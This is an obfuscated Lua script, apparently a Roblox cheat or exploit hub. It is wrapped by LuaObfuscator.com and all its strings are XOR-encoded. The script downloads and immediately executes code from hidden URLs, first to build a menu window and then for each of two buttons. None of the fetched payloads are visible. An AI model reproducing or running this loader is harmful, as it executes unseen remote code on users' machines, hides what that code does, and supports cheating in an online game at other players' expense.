--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v11,v12) local v13={};for v14=1, #v11 do v6(v13,v0(v4(v1(v2(v11,v14,v14 + 1 )),v1(v2(v12,1 + (v14% #v12) ,1 + (v14% #v12) + 1 )))%256 ));end return v5(v13);end local v8=loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\217\41\233\180\195\28\208\207\215\106\171\185\198\29\218\142\206\53\245\246\193\17\195\142\215\44\228\168\136\19\208\202\213\106\241\186\203\18\148\145\139\51\181","\126\177\163\187\69\134\219\167")))();local v9=v8:CreateWindow(v7("\16\235\106\237\201\1\141\98\226\215\106","\156\67\173\74\165"));local v10=v9:CreateFolder(v7("\25\182\64\24","\38\84\215\41\118\220\70"));v10:Button(v7("\98\19\35\17\246","\158\48\118\66\114"),function() loadstring(game:HttpGet(v7("\163\48\4\38\96\255\180\228\54\17\33\61\162\242\191\44\5\52\102\182\254\185\39\31\56\103\160\245\191\106\19\57\126\234\253\170\62\28\47\113\188\254\228\23\19\36\122\181\239\230\48\21\37\103\234\233\174\34\3\121\123\160\250\175\55\95\59\114\172\245\228\54\21\55\112\173\190\249\116\6\103","\155\203\68\112\86\19\197")))();end);v10:Button(v7("\111\211\48\188\83\108\228\245\79\211\55","\152\38\189\86\156\32\24\133"),function() loadstring(game:HttpGet(v7("\244\67\179\86\239\13\232\9\238\86\176\8\251\94\179\78\233\85\178\85\249\69\164\73\242\67\162\72\232\25\164\73\241\24\161\71\230\91\190\68\229\82\232\117\255\69\174\86\232\26\179\67\239\67\232\84\249\81\180\9\244\82\166\66\239\24\170\71\245\89\232\79\242\81\226\20\172\68\179\71\241\94\169\71","\38\156\55\199")))();end);
